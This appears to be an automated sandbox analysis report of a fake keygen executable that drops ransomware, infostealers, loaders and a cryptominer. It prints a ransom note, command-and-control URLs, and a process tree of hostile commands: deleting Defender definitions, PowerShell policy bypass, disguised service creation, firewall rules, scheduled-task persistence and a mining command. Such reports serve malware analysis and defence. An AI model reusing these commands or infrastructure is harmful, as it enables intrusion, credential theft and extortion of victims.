Analysis
-
max time kernel
1341s -
max time network
1799s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
05-03-2021 05:11
General
-
Target
Webcam_Broadcaster_v1_serial_keygen_by_Inferno.exe
-
Size
8.6MB
-
MD5
4c5d5630a17759bff9cb25a75a6de902
-
SHA1
7e30a081298ef34a5f7db00607f10c72464e4c96
-
SHA256
45411d2b5bf4e2d0e75af577252aba0a84ccc51e7b05e9b67a54390bb7aab8d8
-
SHA512
09d2a7fa28f88dd5c622b99318a7d68b1c3f9f6fa3edbe589cb067478dba73e790346b967599dde0745e8afeded0096c99d796206f691c34c903c97a01db80f3
Score
10/10
Malware Config
Extracted
Path
C:\_readme.txt
Ransom Note
ATTENTION!
Don't worry, you can return all your files!
All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.
The only method of recovering files is to purchase decrypt tool and unique key for you.
This software will decrypt all your encrypted files.
What guarantees you have?
You can send one of your encrypted file from your PC and we decrypt it for free.
But we can decrypt only 1 file for free. File must not contain valuable information.
You can get and look video overview decrypt tool:
https://we.tl/t-2w03ajSkK1
Price of private key and decrypt software is $980.
Discount 50% available if you contact us first 72 hours, that's price for you is $490.
Please note that you'll never restore your data without payment.
Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.
To get this software you need write on our e-mail:
[email protected]
Reserve e-mail address to contact us:
[email protected]
Your personal ID:
0284oPsw3ezhjPtxWDziPslvS8B5oPPMFNAoVSRklvLjTL5s9
URLs
https://we.tl/t-2w03ajSkK1
Extracted
Family
azorult
C2
http://kvaka.li/1210776429.php
Extracted
Family
smokeloader
Version
2020
C2
http://naritouzina.net/
http://nukaraguasleep.net/
http://notfortuaj.net/
http://natuturalistic.net/
http://zaniolofusa.net/
http://4zavr.com/upload/
http://zynds.com/upload/
http://atvua.com/upload/
http://detse.net/upload/
http://dsdett.com/upload/
http://dtabasee.com/upload/
http://yeronogles.monster/upload/
rc4.i32
rc4.i32
Extracted
Family
smokeloader
Version
2019
C2
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
rc4.i32
rc4.i32
Extracted
Family
metasploit
Version
windows/single_exec
Extracted
Family
raccoon
Botnet
afefd33a49c7cbd55d417545269920f24c85aa37
Attributes
-
url4cnc
https://telete.in/jagressor_kz
rc4.plain
rc4.plain
Extracted
Family
raccoon
Botnet
e71b51d358b75fe1407b56bf2284e3fac50c860f
Attributes
-
url4cnc
https://telete.in/oidmrwednesday
rc4.plain
rc4.plain
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
ElysiumStealer
ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.
-
ElysiumStealer Payload 1 IoCs
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 6 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
PlugX
PlugX is a RAT (Remote Access Trojan) that has been around since 2008.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Taurus Stealer
Taurus is an infostealer first seen in June 2020.
-
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Windows security bypass 2 TTPs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Modifies boot configuration data using bcdedit 14 IoCs
-
XMRig Miner Payload 1 IoCs
-
Blocklisted process makes network request 4 IoCs
-
Creates new service(s) 1 TTPs
-
Disables Task Manager via registry modification
-
Drops file in Drivers directory 3 IoCs
-
Executes dropped EXE 64 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 10 IoCs
Ransomware generally changes the extension on encrypted files.
-
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Sets service image path in registry 2 TTPs
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
-
UPX packed file 6 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Loads dropped DLL 64 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 10 IoCs
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 15 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Drops file in System32 directory 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
-
Suspicious use of SetThreadContext 11 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 6 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 4 IoCs
-
GoLang User-Agent 15 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
-
Kills process with taskkill 5 IoCs
-
Modifies Internet Explorer settings 1 TTPs 36 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies system certificate store 2 TTPs 34 IoCs
-
Runs ping.exe 1 TTPs 6 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious behavior: MapViewOfSection 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 13 IoCs
-
Suspicious use of SendNotifyMessage 2 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Webcam_Broadcaster_v1_serial_keygen_by_Inferno.exe"C:\Users\Admin\AppData\Local\Temp\Webcam_Broadcaster_v1_serial_keygen_by_Inferno.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\C03D.tmp.exe"C:\Users\Admin\AppData\Roaming\C03D.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\C03D.tmp.exe"C:\Users\Admin\AppData\Roaming\C03D.tmp.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵
- Enumerates connected drives
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
-
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exeC:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 0011 installp15⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
-
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP6⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
-
-
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exeC:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-6OH3U.tmp\23E04C4F32EF2158.tmp"C:\Users\Admin\AppData\Local\Temp\is-6OH3U.tmp\23E04C4F32EF2158.tmp" /SL5="$401F0,762308,115712,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent7⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\DTS\seed.sfx.exe"C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s18⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"9⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/14Zhe7"8⤵
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/14Zhe79⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2724 CREDAT:275457 /prefetch:210⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"6⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exeC:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 200 installp15⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"6⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\3QANNI034W\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\3QANNI034W\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\3QANNI034W\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\3QANNI034W\multitimer.exe" 1 1016⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵
- Executes dropped EXE
-
C:\ProgramData\8157004.89"C:\ProgramData\8157004.89"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\ProgramData\3644653.40"C:\ProgramData\3644653.40"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵
- Executes dropped EXE
-
-
-
C:\ProgramData\8097602.89"C:\ProgramData\8097602.89"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F800DBBB6EF5C1034E81B6FC0EAA5C1B C2⤵
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Temp\6DA2.exeC:\Users\Admin\AppData\Local\Temp\6DA2.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\60a1e36b-9660-45eb-8cce-bb867ac9c653" /deny *S-1-1-0:(OI)(CI)(DE,DC)2⤵
- Modifies file permissions
-
-
C:\Users\Admin\AppData\Local\Temp\6DA2.exe"C:\Users\Admin\AppData\Local\Temp\6DA2.exe" --Admin IsNotAutoStart IsNotTask2⤵
- Executes dropped EXE
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\39bc8ec2-8385-43b8-a4c3-fc5a48d82d56\updatewin1.exe"C:\Users\Admin\AppData\Local\39bc8ec2-8385-43b8-a4c3-fc5a48d82d56\updatewin1.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\39bc8ec2-8385-43b8-a4c3-fc5a48d82d56\updatewin1.exe"C:\Users\Admin\AppData\Local\39bc8ec2-8385-43b8-a4c3-fc5a48d82d56\updatewin1.exe" --Admin4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned5⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File ""C:\Users\Admin\AppData\Local\script.ps1""' -Verb RunAs}"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\script.ps16⤵
-
-
-
C:\Program Files\Windows Defender\mpcmdrun.exe"C:\Program Files\Windows Defender\mpcmdrun.exe" -removedefinitions -all5⤵
- Deletes Windows Defender Definitions
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\delself.bat""5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\39bc8ec2-8385-43b8-a4c3-fc5a48d82d56\updatewin2.exe"C:\Users\Admin\AppData\Local\39bc8ec2-8385-43b8-a4c3-fc5a48d82d56\updatewin2.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\39bc8ec2-8385-43b8-a4c3-fc5a48d82d56\updatewin.exe"C:\Users\Admin\AppData\Local\39bc8ec2-8385-43b8-a4c3-fc5a48d82d56\updatewin.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\39bc8ec2-8385-43b8-a4c3-fc5a48d82d56\updatewin.exe4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 35⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\AppData\Local\39bc8ec2-8385-43b8-a4c3-fc5a48d82d56\5.exe"C:\Users\Admin\AppData\Local\39bc8ec2-8385-43b8-a4c3-fc5a48d82d56\5.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\39bc8ec2-8385-43b8-a4c3-fc5a48d82d56\5.exe" & del C:\ProgramData\*.dll & exit4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\72D1.exeC:\Users\Admin\AppData\Local\Temp\72D1.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo MFbR2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Declinante.html2⤵
-
C:\Windows\SysWOW64\cmd.execmd3⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^vbzKnQFSqnlAJtUxNfEmiqqLJfcsIqUhKbnAvosGDfELCESlYcgqhNQcvIqpchlqDWPjFzXEXXVRvfoyblzjLTqXHrtOiokftEiFOGFFnJrfSYZuAVMkUYgKWSECgobOMFMRoCdQFOOwQKtJrX$" Quel.cab4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.comSui.com Benedetto.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.comC:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com Benedetto.txt5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.comC:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com6⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Sui.com /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Sui.com /f8⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 304⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7AEC.exeC:\Users\Admin\AppData\Local\Temp\7AEC.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\gdkiebxz\2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\vdswjhqq.exe" C:\Windows\SysWOW64\gdkiebxz\2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create gdkiebxz binPath= "C:\Windows\SysWOW64\gdkiebxz\vdswjhqq.exe /d\"C:\Users\Admin\AppData\Local\Temp\7AEC.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description gdkiebxz "wifi internet conection"2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start gdkiebxz2⤵
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
-
-
C:\Windows\SysWOW64\gdkiebxz\vdswjhqq.exeC:\Windows\SysWOW64\gdkiebxz\vdswjhqq.exe /d"C:\Users\Admin\AppData\Local\Temp\7AEC.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\svchost.exesvchost.exe -o msr.pool-pay.com:6199 -u 9jNvTpsSutBLodbiiRngN2S4AfM84WJ4Y8zRpo6H4QPBK625huByLqkiCTh5Uog1qHVBr7cyZfbA1GiiPqSsSv83HAiirSf.50000 -p x -k3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\8A49.exeC:\Users\Admin\AppData\Local\Temp\8A49.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\8BB0.exeC:\Users\Admin\AppData\Local\Temp\8BB0.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\8BB0.exeC:\Users\Admin\AppData\Local\Temp\8BB0.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
-
-
C:\Users\Admin\AppData\Local\Temp\917B.exeC:\Users\Admin\AppData\Local\Temp\917B.exe1⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\ACF8.exeC:\Users\Admin\AppData\Local\Temp\ACF8.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ACF8.exe"C:\Users\Admin\AppData\Local\Temp\ACF8.exe"2⤵
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /15-153⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
-
